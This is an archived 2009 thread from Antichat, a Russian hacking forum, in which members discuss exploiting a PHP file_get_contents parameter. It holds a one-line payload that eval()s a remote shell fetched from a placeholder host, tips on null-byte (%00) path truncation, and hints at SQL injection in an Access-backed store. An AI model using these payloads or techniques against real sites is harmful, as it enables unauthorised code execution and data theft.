01.02.2009, 03:08
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
procedure
PHP код:
<?php eval(file_get_contents("http://путь.до/шелла/без_символов_открытыя_кода"));?>
?
|
|
|
01.02.2009, 03:11
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
Сообщение от sabe
procedure
PHP код:
<?php eval(file_get_contents("http://путь.до/шелла/без_символов_открытыя_кода"));?>
?
а это что ещё???
там что, сказано что этот file_get_contents исполняется? там макс что можно, это прочитать файлы.. если хватит конфигов, да и если вывод есть..
|
|
|
|
01.02.2009, 03:09
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
С нами:
9677126
Репутация:
1158
|
|
mailbrush
)))
конечно это смотря что происходит с этим file_get_contents, если выводится итд, то гут..
Все на страницу выводится, параметр get. А где можно прочитать про null байт?
sabe бля сегодня день рождения у webkillá что все ведут себя так? ) |
|
|
|
01.02.2009, 03:10
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
%00
просто отрезает то, что после него идет
|
|
|
|
01.02.2009, 03:11
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
С нами:
9677126
Репутация:
1158
|
|
./docs/danger\0/body.html
- от такая хня получается(
|
|
|
|
01.02.2009, 13:27
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от procedure
./docs/danger\0/body.html
- от такая хня получается(
Нулл байт экранируется, включена маджик квот.
AHMED HASSAN Официальный язык форума Русский, будь добр, пользуйся онлайн переводчиками (хотя-бы), или задавай вопросы в английском разделе.
Official language a forum Russian, if you please, use online translators , or ask questions in English section.
По поводу вопроса: это Access
http://forum.antichat.ru/thread50550.html
|
|
|
|
01.02.2009, 03:15
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
там макс что можно, это прочитать файлы..
я откуда знаю что там вобще) я думал есть возможность заливать ) увЫ
|
|
|
|
01.02.2009, 10:04
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
159932, а что ты ржешь? Я не думал что у него стр идет гетом или постом,а думал что он тупо может ею управлять =\
|
|
|
|
01.02.2009, 14:51
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
Сообщение от mailbrush
159932, а что ты ржешь? Я не думал что у него стр идет гетом или постом,а думал что он тупо может ею управлять =\
даже если имеется возможность назначить собственное значение для $str, это никак не позволит выполнить код в file_get_contents(), как было предложено тобой.
тут надо уточнить, если параметры пришедшие из вне вставляються в гверю без скобок
@AkyHa_MaTaTa
без кавычек 
|
|
|
|
01.02.2009, 13:12
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
С нами:
10023542
Репутация:
1
|
|
hi
sorry for my language
what to do with this
Microsoft JET Database Engine error '80040e10'
No value given for one or more required parameters.
/store/ancillary.asp, line 17
thanx
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1092923){kind=avatar}
Похожие темы
Комбинированный вид
